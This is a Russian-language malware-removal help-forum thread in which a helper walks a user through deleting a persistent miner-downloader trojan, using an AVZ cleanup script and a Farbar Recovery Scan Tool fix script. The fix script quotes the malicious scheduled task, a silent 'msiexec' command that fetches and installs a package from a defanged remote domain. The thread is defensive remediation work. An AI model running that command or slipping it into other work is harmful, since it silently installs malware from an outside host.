HEUR:Trojan-Downloader.Win32.Miner.gen не удаляется

**RusL1k** · 27.03.2019, 09:52

Не удаляется HEUR:Trojan-Downloader.Win32.Miner.gen, стоит KES 11 .
При попытке удалить, после перезагрузки вновь всплывает окно Касперского с этим вирусом.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 27.03.2019, 09:54

Уважаемый(ая) RusL1k, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**thyrex** · 27.03.2019, 18:17

Выполните скрипт в AVZ из папки Autologger

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 DeleteService('Starter Check');
 DeleteSchedulerTask('{8ED139AD-2318-953A-9D44-3DEA7CEB2B1A}');
 DeleteSchedulerTask('{CA5CBAA3-69ED-2906-FA9D-0D79F23F1850}');
 DeleteFile('C:\ProgramData\WindowsMenu\enplus.exe','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

Обратите внимание: будет выполнена перезагрузка компьютера.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

**RusL1k** · 28.03.2019, 09:27

Выполнено.
Так же приложил скрин всплывающего окна KES при включении ПК

**thyrex** · 28.03.2019, 17:14

Скачайте Farbar Recovery Scan Tool

и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

**RusL1k** · 29.03.2019, 06:47

Готово

**thyrex** · 29.03.2019, 08:14

1. Выделите следующий код:

Код:

Start::
CreateRestorePoint:
2019-03-05 20:37 - 2019-03-10 04:14 - 000000004 _____ C:\Users\Все пользователи\lock.dat
2019-03-05 20:37 - 2019-03-10 04:14 - 000000004 _____ C:\ProgramData\lock.dat
2019-03-05 20:37 - 2019-03-05 20:37 - 000000008 _____ C:\Users\Все пользователи\ts.dat
2019-03-05 20:37 - 2019-03-05 20:37 - 000000008 _____ C:\ProgramData\ts.dat
2019-03-05 20:35 - 2019-03-05 20:35 - 000000011 _____ C:\Users\cits_ams2\setup24.ini
2019-03-05 20:35 - 2019-03-05 20:35 - 000000009 _____ C:\Users\cits_ams2\rstr4.ini
2019-03-05 20:31 - 2019-03-28 10:13 - 000000000 ____D C:\Program Files (x86)\FastDataX
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\cits_ams2\uUEXIJEUOqe.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\uIAkWUdYr.exe
C:\Temp\ImagingEngine.dll
Task: {1D46EFB5-4632-4318-ACB8-3FF5260CC823} - System32\Tasks\{CA5CBAA3-69ED-2906-FA9D-0D79F23F1850} => "msiexec.exe" -q /package hxxps://refreshnerer711rb.info/kPIJ9cEuj0.1kX <==== ATTENTION
Task: {9CE436B4-6B88-43FF-A318-70AFA4009447} - \Microsoft\Windows\Starter -> No File <==== ATTENTION
Task: {B1999299-AEE6-4EEF-B2F5-9919F27C8247} - \{4CD234A0-F3A6-49FD-8A8F-FDC06573A810} -> No File <==== ATTENTION
Task: {B6C43FF2-54A0-445A-A405-1046C341140C} - \Microsoft\QuickLaunch -> No File <==== ATTENTION
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Обратите внимание: будет выполнена перезагрузка компьютера.

**RusL1k** · 29.03.2019, 13:25

Готово

**thyrex** · 29.03.2019, 13:49

Что с проблемой?

**RusL1k** · 30.03.2019, 12:14

Вроде бы все ок.
Спасибо.

HEUR:Trojan-Downloader.Win32.Miner.gen не удаляется (заявка № 222378)

Опции темы